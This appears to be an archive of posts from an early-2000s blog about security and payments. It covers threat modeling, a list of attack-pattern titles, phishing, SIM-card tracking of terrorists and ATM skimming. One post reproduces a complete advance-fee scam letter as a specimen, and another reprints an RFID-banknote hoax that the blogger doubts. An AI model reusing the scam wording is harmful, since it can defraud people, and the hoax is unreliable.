    Overall, threat modeling involves identifying the key assets of an application, decomposing the application, identifying and categorizing the threats to each asset or component, rating the threats based on a risk ranking, and then developing threat mitigation strategies that are then implemented in designs, code, and test cases. Microsoft has defined a structured method for threat modeling, consisting of the following steps [Howard 2002].

  • Identify assets
  • Create an architecture overview
  • Decompose the application
  • Identify the threats
  • Categorize the threats using the STRIDE model (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege)
  • Rank the threats using the DREAD categories (Damage potential, Reproducibility, Exploitability, Affected users, and Discoverability)
  • Develop threat mitigation strategies for the highest ranking threats

    Other structured methods for threat modeling are available as well [Schneier].

    Although some anecdotal evidence exists for the effectiveness of threat modeling in reducing security vulnerabilities, no empirical evidence is readily available.

    Attack Trees

    Attack trees characterize system security when faced with varying attacks. The use of Attack Trees for characterizing system security is based partially on Nancy Leveson's work with "fault trees" in software safety [Leveson]. Attack trees model the decisionmaking process of attackers. Attacks against a system are represented in a tree structure. The root of the tree represents the potential goal of an attacker (for example, to steal a credit card number). The nodes in the tree represent actions the attacker takes, and each path in the tree represents a unique attack to achieve the goal of the attacker.

    Attack trees can be used to answer questions such as what is the easiest attack. The cheapest attack? The attack that causes the most damage? The hardest to detect attack? Attack trees are used for risk analysis, to answer questions about the system's security, to capture security knowledge in a reusable way, and to design, implement, and test countermeasures to attacks [Viega] [Schneier] [Moore].

    Just as with Threat Modeling, there is anecdotal evidence of the benefits of using Attack Trees, but no empirical evidence is readily available.

    Attack Patterns

    Hoglund and McGraw have identified forty-nine attack patterns that can guide design, implementation, and testing [Hoglund]. These soon to be published patterns include:

    1. Make the Client Invisible
    2. Target Programs That Write to Privileged OS Resources
    3. Use a User-Supplied Configuration File to Run Commands That Elevate Privilege
    4. Make Use of Configuration File Search Paths
    5. Direct Access to Executable Files
    6. Embedding Scripts within Scripts
    7. Leverage Executable Code in Nonexecutable Files
    8. Argument Injection
    9. Command Delimiters
    10. Multiple Parsers and Double Escapes
    11. User-Supplied Variable Passed to File System Calls
    12. Postfix NULL Terminator
    13. Postfix, Null Terminate, and Backslash
    14. Relative Path Traversal
    15. Client-Controlled Environment Variables
    16. User-Supplied Global Variables (DEBUG=1, PHP Globals, and So Forth)
    17. Session ID, Resource ID, and Blind Trust
    18. Analog In-Band Switching Signals (aka "Blue Boxing")
    19. Attack Pattern Fragment: Manipulating Terminal Devices
    20. Simple Script Injection
    21. Embedding Script in Nonscript Elements
    22. XSS in HTTP Headers
    23. HTTP Query Strings
    24. User-Controlled Filename
    25. Passing Local Filenames to Functions That Expect a URL
    26. Meta-characters in E-mail Header
    27. File System Function Injection, Content Based
    28. Client-side Injection, Buffer Overflow
    29. Cause Web Server Misclassification
    30. Alternate Encoding the Leading Ghost Characters
    31. Using Slashes in Alternate Encoding
    32. Using Escaped Slashes in Alternate Encoding
    33. Unicode Encoding
    34. UTF-8 Encoding
    35. URL Encoding
    36. Alternative IP Addresses
    37. Slashes and URL Encoding Combined
    38. Web Logs
    39. Overflow Binary Resource File
    40. Overflow Variables and Tags
    41. Overflow Symbolic Links
    42. MIME Conversion
    43. HTTP Cookies
    44. Filter Failure through Buffer Overflow
    45. Buffer Overflow with Environment Variables
    46. Buffer Overflow in an API Call
    47. Buffer Overflow in Local Command-Line Utilities
    48. Parameter Expansion
    49. String Format Overflow in syslog()

    These attack patterns can be used discover potential security defects.

    References

    [Saltzer] Saltzer, Jerry, and Mike Schroeder, "The Protection of Information in Computer Systems", Proceedings of the IEEE. Vol. 63, No. 9 (September 1975), pp. 1278-1308. Available on-line at http://cap-lore.com/CapTheory/ProtInf/.
    [Neumann] Neumann, Peter, Principles Assuredly Trustworthy Composable Architectures: (Emerging Draft of the) Final Report, December 2003
    [Viega] Viega, John, and Gary McGraw. Building Secure Software: How to Avoid Security Problems the Right Way, Reading, MA: Addison Wesley, 2001.
    [Howard 2002] Howard, Michael, and David C. LeBlanc. Writing Secure Code, 2nd edition, Microsoft Press, 2002
    [Schneier] Schneier, Bruce. Secrets and Lies: Digital Security in a Networked World, John Wiley & Sons (2000)
    [Leveson] Leveson, Nancy G. Safeware: System Safety and Computers, Addison-Wesley, 1995.
    [Moore 1999] Moore, Geoffrey A., Inside the Tornado : Marketing Strategies from Silicon Valley's Cutting Edge. HarperBusiness; Reprint edition July 1, 1999.
    [Moore 2002] Moore, Geoffrey A. Crossing the Chasm. Harper Business, 2002.
    [Hogland] Hoglund, Greg, and Gary McGraw. Exploiting Software: How to break code. Addison-Wesley, 2004

    Posted by iang at 07:54 AM | Comments (0) | TrackBack
  • March 30, 2004

    Spammer's Porsche up for grabs

    Story on how the "free email leads to spam" equation is being changed with massive private litigation:

    Internet giant AOL has ratcheted up the war against unsolicited e-mail with a publicity-grabbing coup - an online raffle of a spammer's seized Porsche.

    AOL won the car - a $47,000 Boxster S - as part of a court settlement against an unnamed e-mailer last year.

    "We'll take cars, houses, boats - whatever we can find and get a hold of," said AOL's Randall Boe.

    According to Mr Boe, the Porsche's previous owner made more than $1m by sending junk e-mail.

    Hitting them where it hurts

    AOL is one of the noisiest opponents of the evasive spam trade, and this month joined forces with Microsoft, Yahoo and Earthlink to sue hundreds of spammers.

    Seizure of property is becoming a major tactic in these lawsuits, since guilty spammers often protest their inability to pay large fines.


    The Porsche-owning spammer, whose identity remains confidential, was one of a group sued last year for having sent 1 billion junk messages to AOL members, pitching pornography, college degrees, cable TV descramblers and other products.

    Mr Boe said the Porsche was seized mainly for its symbolic value, as the obvious fruit of an illegal trade.

    The Porsche sweepstake lasts until 8 April, and will be open only to those who were AOL members when it was first announced.

    Story from BBC NEWS:
    http://news.bbc.co.uk/go/pr/fr/-/2/hi/business/3581435.stm

    Published: 2004/03/30 07:20:09 GMT

    © BBC MMIV

    Posted by iang at 04:50 PM | Comments (0) | TrackBack

    March 18, 2004

    Terror network was tracked by cellphone chips

    A good article on the tracking of terror cells, drawing from some weaknesses in cell commsec. The article appears, and purports, to be complete, only because the methods described have already been rendered useless: A new weapon, a new defence. Anti-terror battles are like that; this shows how much more police-style investigation is effective against terrorism than a military posture.

    http://www.iht.com/articles/508783.html

    Terror network was tracked by cellphone chips

    Don Van Natta Jr. and Desmond Butler/NYT
    Thursday, March 4, 2004

    How cellphones helped track global terror web

    LONDON The terrorism investigation code-named Mont Blanc began almost by accident in April 2002, when authorities intercepted a cellphone call that lasted less than a minute and involved not a single word of conversation.

    Investigators, suspicious that the call was a signal between terrorists, followed the trail first to one terror suspect, then to others, and eventually to terror cells on three continents.

    What tied them together was a computer chip smaller than a fingernail. But before the investigation wound down in recent weeks, its global net caught dozens of suspected Qaeda members and disrupted at least three planned attacks in Saudi Arabia and Indonesia, according to counterterrorism and intelligence officials in Europe and the United States.

    The investigation helped narrow the search for one of the most wanted men in the world, Khalid Shaikh Mohammed, who is accused of being the mastermind of the Sept. 11 attacks, according to three intelligence officials based in Europe. The U.S. authorities arrested Mohammed in Pakistan last March.

    For two years, investigators now say, they were able to track the conversations and movements of several Qaeda leaders and dozens of operatives after determining that the suspects favored a particular brand of cellphone chip. The chips carry prepaid minutes and allow phone use around the world.

    Investigators said they believed that the chips, made by Swisscom of Switzerland, were popular with terrorists because they could buy the chips without giving their names.

    "They thought these phones protected their anonymity, but they didn't," said a senior intelligence official based in Europe. Even without personal information, the authorities were able to conduct routine monitoring of phone conversations.

    A half-dozen senior officials in the United States and Europe agreed to talk in detail about the previously undisclosed investigation because, they said, it was completed. They also said they had strong indications that terror suspects, alert to the phones' vulnerability, had largely abandoned them for important communications and instead were using e-mail, Internet phone calls and hand-delivered messages.

    "This was one of the most effective tools we had to locate Al Qaeda," said a senior counterterrorism official in Europe.

    The officials called the operation one of the most successful investigations since Sept. 11, 2001, and an example of unusual cooperation between agencies in different countries. Led by the Swiss, the investigation involved agents from more than a dozen countries, including the United States, Pakistan, Saudi Arabia, Germany, Britain and Italy.

    In 2002, the German authorities broke up a cell after monitoring calls by Abu Musab al-Zarqawi, who has been linked by some top U.S. officials to Al Qaeda, in which he could be heard ordering attacks on Jewish targets in Germany. Since then, investigators say, Zarqawi has been more cautious.

    "If you beat terrorists over the head enough, they learn," said Colonel Nick Pratt, a counterterrorism expert and professor at the George C. Marshall European Center for Security Studies in Garmisch-Partenkirchen, Germany. "They are smart."

    Officials say that on the rare occasions when operatives still use mobile phones, they keep the calls brief and use code words.

    "They know we are on to them and they keep evolving and using new methods, and we keep finding ways to make life miserable for them," said a senior Saudi official. "In many ways, it's like a cat-and-mouse game."

    Some Qaeda lieutenants used cellphones only to arrange a conversation on a more secure telephone. It was one such brief cellphone call that set off the Mont Blanc investigation.

    The call was placed on April 11, 2002, by Christian Ganczarski, a 36-year-old Polish-born German Muslim who the German authorities suspected was a member of Al Qaeda. From Germany, Ganczarski called Khalid Shaikh Mohammed, said to be Al Qaeda's military commander, who was running operations at the time from a safe house in Karachi, Pakistan, according to two officials involved in the investigation.

    The two men did not speak during the call, counterterrorism officials said. Instead, the call was intended to alert Mohammed of a Qaeda suicide bombing mission at a synagogue in Tunisia, which took place that day, according to two senior officials. The attack killed 21 people, mostly German tourists.

    Through electronic surveillance, the German authorities traced the call to Mohammed's Swisscom cellphone, but at first they did not know it belonged to him. Two weeks after the Tunisian bombing, the German police searched Ganczarski's house and found a log of his many numbers, including one in Pakistan that was eventually traced to Mohammed. The German police had been monitoring Ganczarski because he had been seen in the company of militants at a mosque in Duisburg, and last June the French police arrested him in Paris.

    Mohammed's cellphone number, and many others, were given to the Swiss authorities for further investigation. By checking Swisscom's records, Swiss officials discovered that many other Qaeda suspects used the Swisscom chips, known as Subscriber Identity Module, or SIM cards, which allow phones to connect to cellular networks.

    For months the Swiss, working closely with counterparts in the United States and Pakistan, used this information in an effort to track Mohammed's movements inside Pakistan. By monitoring the cellphone traffic, they were able to get a fix on Mohammed, but the investigators did not know his specific location, officials said.

    Once Swiss agents had established that Mohammed was in Karachi, the U.S. and Pakistani security services took over the hunt with the aid of technology at the U.S. National Security Agency, said two senior European intelligence officials. But it took months for them to actually find Mohammed "because he wasn't always using that phone," an official said. "He had many, many other phones."

    Mohammed was a victim of his own sloppiness, said a senior European intelligence official. He was meticulous about changing cellphones, but apparently he kept using the same SIM card.

    In the end, the authorities were led directly to Mohammed by a CIA spy, the director of central intelligence, George Tenet, said in a speech last month. A senior U.S. intelligence official said this week that the capture of Mohammed "was entirely the result of excellent human operations."

    When Swiss and other European officials heard that U.S. agents had captured Mohammed last March, "we opened a big bottle of Champagne," a senior intelligence official said.

    Among Mohammed's belongings, the authorities seized computers, cellphones and a personal phone book that contained hundreds of numbers. Tracing those numbers led investigators to as many as 6,000 phone numbers, which amounted to a virtual road map of Al Qaeda's operations, officials said.

    The authorities noticed that many of Mohammed's communications were with operatives in Indonesia and Saudi Arabia. Last April, using the phone numbers, officials in Jakarta broke up a terror cell connected to Mohammed, officials said.

    After the suicide bombings of three housing compounds in Riyadh, Saudi Arabia, on May 12, the Saudi authorities used the phone numbers to track down two "live sleeper cells." Some members were killed in shootouts with the authorities; others were arrested.

    Meanwhile, the Swiss had used Mohammed's phone list to begin monitoring the communications and activities of nearly two dozen of his associates. "Huge resources were devoted to this," a senior official said. "Many countries were constantly doing surveillance, monitoring the chatter."

    Investigators were particularly alarmed by one call they overheard last June. The message: "The big guy is coming. He will be here soon."

    An official familiar with the calls said, "We did not know who he was, but there was a lot of chatter." Whoever "the big guy" was, the authorities had his number. A Swisscom chip was in the phone.

    "Then we waited and waited, and we were increasingly anxious and worried because we didn't know who it was or what he had intended to do," an official said.

    But in July, the man believed to be "the big guy," Abdullah Oweis, who was born in Saudi Arabia, was arrested in Qatar. "He is one of those people able to move within Western societies and to help the mujahedeen, who have lesser experience," an official said. "He was at the very center of the Al Qaeda hierarchy. He was a major facilitator."

    In January, the operation led to the arrests of eight people accused of being members of a Qaeda logistical cell in Switzerland.

    Some are suspected of helping with the suicide bombings of the housing compounds in Riyadh, which killed 35 people, including eight Americans.

    Later, the European authorities discovered that Mohammed had contacted a company in Geneva that sells Swisscom phone cards. Investigators said he ordered the cards in bulk.

    The New York Times

    Copyright © 2003 The International Herald Tribune

    Posted by iang at 06:33 PM | Comments (0) | TrackBack

    March 17, 2004

    Centralised Insecurity

    What surprises me is that no-one is asking why we think the government can do a better job with centralised security than the rest of us can do by ourselves. Whoops! Spoke to soon - Bruce Schneier writes about exactly that in
    Security Risks of Centralization
    .


    Security Risks of Centralization

    In discussions with Brill, he regularly said things like: "It's obviously better to do something than nothing." Actually, it's not obvious. Replacing several decentralized security systems with a single centralized security system can actually reduce the overall security, even though the new system is more secure than the systems being replaced.

    An example will make this clear. I'll postulate piles of money secured by individual systems. The systems are characterized by the cost to break them. A $100 pile of money secured by a $200 system is secure, since it's not worth the cost to break. A $100 pile of money secured by a $50 system is insecure, since an attacker can make $50 profit by breaking the security and stealing the money.

    Here's my example. There are 10 $100 piles, each secured by individual $200 security systems. They're all secure. There are another 10 $100 piles, each secured by individual $50 systems. They're all insecure.

    Clearly something must be done.

    One suggestion is to replace all the individual security systems by a single centralized system. The new system is much better than the ones being replaced; it's a $500 system.

    Unfortunately, the new system won't provide more security. Under the old systems, 10 piles of money could be stolen at a cost of $50 per pile; an attacker would realize a total profit of $500. Under the new system, we have 20 $100 piles all secured by a single $500 system. An attacker now has an incentive to break that more-secure system, since he can steal $2000 by spending $500 -- a profit of $1500.

    The problem is centralization. When individual security systems are combined in one centralized system, the incentive to break that new system is generally higher. Even though the centralized system may be harder to break than any of the individual systems, if it is easier to break than ALL of the individual systems, it may result in less security overall.

    There is a security benefit to decentralized security.

    Posted by iang at 12:08 PM | Comments (0) | TrackBack

    U.S. info-sharing program draws fire

    Bruce Schneier's cryptogram pointed at the controversial new program that encourages US companies to share their vulnerability information with the Department of Homeland Defense.

    It's a bit long to post, but it's well worth reading if one is interested in public & critical infrastructure protection. The bottom line: the new legal protection will probably cause more trouble than its worth, and may make things more insecure:

    U.S. info-sharing program draws fire

    By Kevin Poulsen, SecurityFocus Feb 20 2004 6:08PM

    A long-anticipated program meant to encourage companies to provide the federal government with confidential information about vulnerabilities in critical systems took effect Friday, but critics worry that it may do more harm than good.

    The so-called Protected Critical Infrastructure Information (PCII) program allows corporations who run key elements of U.S. infrastructure -- energy firms, telecommunications carriers, financial institutions, etc. -- to submit details about their physical and cyber vulnerabilities to a newly-formed office within the Department of Homeland Security, with legally-binding assurances that the information will not be used against them or released to the public.

    The program implements controversial legislation that bounced around Capitol Hill for years before Congress passed it in the wake of the September 11 attacks as part of the Homeland Security Act of 2002. Security agencies have long sought information about vulnerabilities and likely attack points in critical infrastructures, but have found the private sector reluctant to share, for fear that sensitive or embarrassing information would be released through the Freedom of Information Act (FOIA).

    As of Friday, federal law now protects that vulnerability information from disclosure through FOIA, and makes it illegal for government workers to leak it, provided companies follow certain procedures and submit the data to the new PCII office.
    ....

    Posted by iang at 11:43 AM | Comments (0) | TrackBack

    March 10, 2004

    Nigerian scammers now using the Queen's English

    I just received my first well written, properly spelt, nigerian fraud letter - and they've moved to Britain! Of course it is the same old same old concept. Text is below if you are even the slightest bit interested.

    My name is Becky J. Harding, I am a senior partner in the firm of Midland Consulting Limited: Private Investigators and Security Consultants. We are conducting a standard process investigation on behalf of HSBC, the International Banking Conglomerate.

    This investigation involves a client who shares the same surname with you and also the circumstances surrounding investments made by this client at HSBC Republic, the Private Banking arm of HSBC. The HSBC Private Banking client died intestate and nominated no successor in title over the investments made with the bank. The essence of this communication with you is to request you provide us information/comments on any or all of the four issues:

    1-Are you aware of any relative/relation who shares your same name whose last known contact address was Brussels Belgium?
    2-Are you aware of any investment of considerable value made by such a person at the Private Banking Division of HSBC Bank PLC?
    3-Born on the 1st of October 1941
    4-Can you establish beyond reasonable doubt your eligibility to assume status of successor in title to the deceased?

    It is pertinent that you inform us ASAP whether or not you are familiar with this personality that we may put an end to this communication with you and our inquiries surrounding this personality.

    You must appreciate that we are constrained from providing you with more detailed information at this point. Please respond to this mail as soon as possible to afford us the opportunity to close this investigation.

    Thank you for accommodating our enquiry.

    Becky J. Harding.
    For: Midland Consulting Limited.
    10/03/2004

    Posted by iang at 02:10 PM | Comments (0) | TrackBack

    March 08, 2004

    PayPal Probed for Anti-Fraud Efforts

    PayPal Probed for Anti-Fraud Efforts
    Monday March 8, 11:51 am ET

    WASHINGTON (Reuters) - Federal and state investigators are examining whether online payment service PayPal violated consumer-protection laws in its fight against online fraud, parent company eBay Inc. (NasdaqNM:EBAY - News) said on Monday.

    PayPal sometimes freezes customer accounts while it investigates suspicious transactions, a practice that has generated complaints to consumer-protection authorities, the online auctioneer said in its annual report.

    "As a result of customer complaints, PayPal has ... received inquiries regarding its restriction and disclosure practices from the Federal Trade Commission and the attorneys general of a number of states," the report said.

    "If PayPal's processes are found to violate federal or state law on consumer protection and unfair business practices, it could be subject to an enforcement action or fines."

    An FTC spokeswoman declined initial comment.

    PayPal handled more than $12.2 billion in transactions in 2003 and has 40 million customer accounts, according to the annual report.

    The rate of fraudulent PayPal transactions is less than one-half of one percent, eBay has said.

    An eBay spokesman was not immediately available for comment.

    © 2004 Reuters

    Posted by iang at 11:44 AM | Comments (0) | TrackBack

    March 05, 2004

    Anti-Phishing WG

    A working group on anti-phishing was formed late last year, and now publishes the first attempts (that I have seen) at hard statiscs on the epidemic in their monthly Phishing Attack Trends Report on the epidemic.

    The report has one salient number: 176 unique phishing attacks in January, up from 116 the previous month. Another document listed on that site (FTC's National and State Trends in Fraud and Identity Theft) showed a figure of $200 million lost in Internet related fraud over the year 2003.

    Worth a read, if looking for hard info on phishing. As the WG has just been formed, and stats only go back a few months, it's too early to tell whether this is the collection ramping up, or we are in the middle of an explosion. The FTC's $200m doesn't drill down any further, so phishing will be some small percentage of that number.

    (I'm not sure why the WG publishes in PDF, instead of HTML. It seems that they are reaching to bureaucrats and marketeers rather than techies, which is a worrying sign.)

    Posted by iang at 12:28 PM | Comments (0) | TrackBack

    March 03, 2004

    Phishing - and now the "solutions providers"

    A "solution" to Phishing called PassMarks has been proposed.

    The solution claims that the site should present an individualised image, the PassMark, to each account on login. Unfortunately, this won't work.

    Phishing involves interposing the attacking site as a spoof between the client's browser and the target site. The spoofing site simply copies the registration details across to the main website, and waits for the PassMark image to come back. And then copies the image back to the user's browser.

    The flaw in their analysis may have been that they didn't realise that almost all phishing totally bypasses SSL. Of course. Or, maybe they didn't realise that the attackers are intelligent, and modify their approach to cope with the system under attack. Easy mistake to make, one supposes.

    The analysis we've done still stands - what is needed to secure browsing against (current day, validated) threats like phishing is to modify the existing underutilised SSL infrastructure in these fairly minor ways:

    The analysis is long, complex and not written down in full. You can see something of the story on the SSL page.

    Further references: The anti-phishing WG's resources page has some potentially useful stuff. Simon's blog entry on PassMark put me on to this product, and also this fair overview by Scott Loftesness.

    Posted by iang at 01:20 PM | Comments (0) | TrackBack

    RFIDs in US notes?

    PrisonPlanet reports that RFIDs are being used in new US notes! Read on for suprising results.

    Is this a spoof or the birth of a new urban legend? If you have nothing better to do, read slashdot's opinion, which amongst much chit chat suggests that this is not RFIDs:

    RFID Tags in New US Notes Explode When You Try to Microwave Them

    Adapted from a letter sent to Henry Makow Ph.D.

    Want to share an event with you, that we experienced this evening.. Dave had over $1000 dollars in his back pocket (in his wallet). New twenties were the lion share of the bills in his wallet. We walked into a truck stop/travel plaza and they have those new electronic monitors that are supposed to say if you are stealing something. But through every monitor, Dave set it off. He did not have anything to purchase in his hands or pockets. After numerous times of setting off these monitors, a person approached Dave with a 'wand' to swipe why he was setting off the monitors.

    Believe it or not, it was his 'wallet'. That is according to the minimum wage employees working at the truck stop! We then walked across the street to a store and purchased aluminum foil. We then wrapped our cash in foil and went thru the same monitors. No monitor went off.

    We could have left it at that, but we have also paid attention to the European Union and the 'rfid' tracking devices placed in their money, and the blatant bragging of Walmart and many corporations of using 'rfid' electronics on every marketable item by the year 2005.

    Dave and I have brainstormed the fact that most items can be 'microwaved' to fry the 'rfid' chip, thus elimination of tracking by our government.

    So we chose to 'microwave' our cash, over $1000 in twenties in a stack, not spread out on a carasoul. Do you know what exploded on American money?? The right eye of Andrew Jackson on the new twenty, every bill was uniform in it's burning... Isnt that interesting?

    Now we have to take all of our bills to the bank and have them replaced, cause they are now 'burnt'.

    We will now be wrapping all of our larger bills in foil on a regular basis.

    What we resent is the fact that the government or a corporation can track our 'cash'. Credit purchases and check purchases have been tracked for years, but cash was not traceble until now...

    Dave and Denise

    Posted by iang at 08:47 AM | Comments (0) | TrackBack

    February 26, 2004

    Browser Threat Model

    All security models call for a threat model; it is one of the key inputs or factors in the construction of the security model. Secure browsing - SSL / HTTPS - lacked this critical analysis, and recent work over on the Mozilla Browser Project is calling for the rectification of this. Here's my attempt at a threat mode for secure browsing, in draft.

    Comments welcome. One thing - I've not found any doco on how a threat model is written out, so I'm in the dark a bit. But, ignorance is no excuse for not trying...

    Posted by iang at 09:23 PM | Comments (2) | TrackBack

    February 25, 2004

    BSD - the world's safest OS

    "London, UK - 19 February 2004, 17:30 GMT - A study by the mi2g Intelligence Unit reveals that the world's safest and most secure online server Operating System (OS) is proving to be the Open Source family of BSD (Berkley Software Distribution) and the Mac OS X based on Darwin. The study also reveals that Linux has become the most breached online server OS in the government and non-government spheres for the first time, while the number of successful hacker attacks against Microsoft Windows based servers have fallen consistently for the last ten months."

    To read the rest, you have to buy the report, but ...

    You can see more in the article below, from last year:

    Linux is favourite hacker target: Study

    By JACK KAPICA Globe and Mail Update
    Friday, Sep. 12, 2003

    Linux, not Microsoft Windows, remains the most-attacked operating system, a British security company reports.

    During August, 67 per cent of all successful and verifiable digital attacks against on-line servers targeted Linux, followed by Microsoft Windows at 23.2 per cent. A total of 12,892 Linux on-line servers running e-business and information sites were successfully breached in that month, followed by 4,626 Windows servers, according to the report.

    Just 360 - less than 2 per cent - of BSD Unix servers were successfully breached in August.

    The data comes from the London-based mi2g Intelligence Unit, which has been collecting data on overt digital attacks since 1995 and verifying them. Its database has tracked more than 280,000 overt digital attacks and 7,900 hacker groups.

    Linux remained the most attacked operating system on-line during the past year, with 51 per cent of all successful overt digital attacks.

    Microsoft Windows servers belonging to governments, however, were the most attacked (51.4 per cent) followed by Linux (14.3 per cent) in August.

    The economic damage from the attacks, in lost productivity and recovery costs, fell below average in August, to $707-million (U.S.).

    The overall economic damage in August from overt and covert attacks as well as viruses and worms stood at an all-time high of $28.2-billion.

    The Sobig and MSBlast malware that afflict Microsoft platforms contributed significantly to the record estimate.

    "The proliferation of Linux within the on-line server community coupled with inadequate knowledge of how to keep that environment secure when running vulnerable third-party applications is contributing to a consistently higher proportion of compromised Linux servers," mi29 chairman D.K. Matai said.

    "Microsoft deserves credit for having reduced the proportion of successful on-line hacker attacks perpetrated against Windows servers."



    Addendum 12 June 2004: This May PR from mi2g gives a bit of an update:

    "The May figures for manual and semi-automated hacking attacks - 18,847 - against online servers worldwide show signs of stabilisation in comparison to each of the three previous months. At present rates, the projected number of overt digital attacks carried out by hackers against online servers in 2004 will be only 2% up on the previous year and would stand at around 220,000. If this trend continues, it will mark the slowest growth rate for manual and semi-automated hacking attacks against online servers according to records that date back to 1995. This confirms that the dominant threat to the global digital eco-system is coming from malware as opposed to direct hacking attacks."

    Posted by iang at 11:18 AM | Comments (0) | TrackBack

    February 24, 2004

    Candid ATM Camera

    Again from Simon Lelieveldt's blog, we see some photos and explanation of a Candid ATM Camera and a duplicate card reader inserted on an ATM Housing, for snooping numbers.

    Just to get a feel for this, it is worth clicking and waiting for the photos to download! Check the quality of the worksmanship for the hidden camera.

    Posted by iang at 06:43 PM | Comments (0) | TrackBack

    February 23, 2004

    Are debit cards safe?

    Simon L mentions this article on debit card fraud. Curiously, no mention of Internet-related frauds, but a nice overview of the ways that ATMs get physically attacked.

    Posted by iang at 04:18 PM | Comments (0) | TrackBack

    February 09, 2004

    e-gold targeted by worm

    News reports from a couple of weeks back indicate that a worm called Dumaru-Y installs a keylogger that listens for e-gold password and account numbers.

    ZDNet .. VNUNet .. TechTarget

    This is significant in that this might be the first time that viruses are specifically targetting the DGCs with an attack on the user's dynamic activity. (MiMail just recently targeted both e-gold and Paypal users with more conventional spoofs.)

    e-gold is a special favourite with scammers and thieves for three reasons: its payments are RTGS, there is a deep market in independent exchange, and e-gold won't provide much help unless with a court order. Also, it is by volume of transactions by far the largest, which provides cover for theft.

    This has been thought about for a long time. In fact, one issuer of gold, eBullion, has had a hardware password token in place for a long time. Others like Pecunix have tried to set up a subsetting password approach, where only a portion of the password is revealed every time.

    European banks delivered hardware tokens routinely to thwart such threats. This may have been prudent, but it also saddled these systems with excessive costs; the price of the eBullion crypto token was thought to be too high for most users.

    Using viruses is a new tactic, but not an unexpected one. As with all wars, look for an escalation of tactics, and commensurate and matching improvements in security.

    Posted by iang at 08:57 PM | Comments (1) | TrackBack

    December 06, 2003

    Fighting the worms of mass destruction

    In a rare burst of journalistic research, the Economist has a good article on the state of viruses and similar security threats.

    It downplays terrorism, up-plays phishing, agrees that Microsoft is a monoculture, but disagrees with any conclusions promoted.

    Even better, the Economist goes on to be quite perceptive about the future of anonymity, psuedonymity, and how to protect privacy. It's almost as if they did their homework! Well done, and definitely worth reading.

    Posted by iang at 09:45 PM | Comments (0) | TrackBack

    November 09, 2003

    The Good, The Bad, and the Ugly

    Microsoft's new bounty program has all the elements of a classic movie script [1]. In Sergio Leone's 3rd spagetti western, The Man with No Name makes good money as a bounty hunter [2]. Is this another chance for him?

    Microsoft's theory is that they can stick up a few wanted posters, and thus rid the world of these Ugly virus writers. Law Enforcement Officers with angel eyes will see this as a great opportunity. Microsoft has all this cash, and the LEOs need a helping hand. Surely with the right incentives, they can file the report to the CyberSecurity Czar in Washington that the tips are flooding in?

    Wait for the tips, and go catch the Uglies. (And pay out the bounty.) Nothing could be simpler than that. Wait for more tips, and go catch more Uglies. And...

    Wait a minute! In the film, Tuco (the Ugly) and The Man with no Name (the Good) are in cohoots! Somehow, Tuco always gets away, and the two of them split the bounty. Again and again... It's a great game.

    Make no mistake, $250,000 in Confederate Gold just changed the incentive structure for your average virus writer. Up until now, writing viruses was just for fun. A challenge. Or a way to take down your hated anti-spam site. Some way for the frustrated ex-soviet nuclear scientist to stretch his talents. Or a way to poke a little fun at Microsoft.

    Now, there is financial incentive. With one wanted poster, Microsoft has turned virus writing into a profitable business. All Blondie has to do is write a virus, blow away a few million user installations, and then convince Tuco to sit still for a while in a Yankee jail.

    The Man with No Name may just ride again!

    [1] http://news.com.com/2100-1083-5103923.html
    [2] http://www.amazon.com/exec/obidos/ASIN/6304698798/

    Posted by iang at 01:41 AM | Comments (0) | TrackBack

    October 03, 2003

    Using SMS Challenge/Response to Secure Web Sites

    Merchants who *really* rely on their web site being secure are those that take instructions for the delivery of value over them. It's a given that they have to work very hard to secure their websites, and it is instructive to watch their efforts.

    The cutting edge in making web sites secure is occuring in gold community and presumably the PayPal community (I don't really follow the latter). AFAIK, this has been the case since the late 90's, before that, some of the European banks were doing heavy duty stuff with expensive tokens.

    e-gold have a sort of graphical number that displays and has to be entered in by hand [1]. This works against bots, but of course, the bot writers have conquered it somehow. e-gold are of course the recurrent victim of the spoofers, and it is not clear why they have not taken more serious steps to protect themselves against attacks on their system.

    eBullion sell an expensive hardware token that I have heard stops attacks cold, but suffers from poor take up because of its cost [2].

    Goldmoney relies on client certs, which also seems to be poor in takeup. Probably more to do with the clumsiness of them, due to the early uncertain support in the browser and in the protocol. Also, goldmoney has structured themselves to be an unattractive target for attackers, using governance and marketing techniques, so I expect them to be the last to experience real tests of their security.

    Another small player called Pecunix allows you to integrate your PGP key into your account, and confirm your nymity using PGP signatures. At least one other player had decided to try smart cards.

    Now a company called NetPay.TV - I have no idea about them, really - have started a service that sends out a 6 digit pin over the SMS messaging features of the GSM network for the user to type in to the website [4].

    It's highly innovative and great security to use a completely different network to communicate with the user and confirm their nymity. On the face of it, it would seem to pretty much knock a hole into the incessant, boring and mind-bogglingly simple attacks against the recommended SSL web site approach.

    What remains to be seen is if users are prepared to pay 15c each time for the SMS message. In Europe, SMS messaging is the rage, so there won't be much of a problem there, I suspect.

    What's interesing here is that we are seeing the market for security evolve and bypass the rather
    broken model that was invented by Netscape back in '94 or so. In the absence of structured, institutional, or mandated approaches, we now have half a dozen distinct approaches to web site application security [4].

    As each of the programmes are voluntary, we have a fair and honest market test of the security results [5].

    [1] here's one if it can be seen:
    https://www.e-gold.com/acct/gen3.asp?x=3061&y=62744C0EB1324BD58D24CA4389877672
    Hopefully that doesn't let you into my account! It's curious, if you change the numbers in the above URL, you get a similar drawing, but it is wrong...
    [2] All companies are .com, unless otherwise noted.
    [3] As well as the activity on the gold side, there are the adventures of PayPal with its pairs of tiny payments made to users' conventional bank accounts.
    [4] http://www.netpay.tv/news.htm
    [5] I just thought of an attack against NetPay.TV, but I'll keep quiet so as not to enjoy anyone else's
    fun :-)

    Posted by iang at 12:20 PM | Comments (0) | TrackBack

    September 28, 2003

    Nobody ever got Fired for Buying Microsoft!

    It is now clear that the U.S. Department of Homeland Security need rely on no-one to advise them on computer security risks to the homeland. The binary choice of Microsoft as either a) good or b) bad, has now become a unary choice of a) good. At least, by all gainfully employed security experts [1].

    So, why waste the taxpayer's money in asking anyone?

    This may make USG purchasing decisions easy, but the expulsion of Dan Geer was rather ham fisted, and will haunt Microsoft in the private sector for some time.

    IBM used to pull this trick, back in the good old days of pre-net (I'm talking the 70's and 80's here...). Then, if you went up against the IBM purchasing decision, you knew your job was on the line.

    Everyone in the industry knew what "nobody ever got fired..." meant. It didn't only mean that your job was safe if you bought IBM, it also meant that you could be receiving your pink slip for challenging the decision.

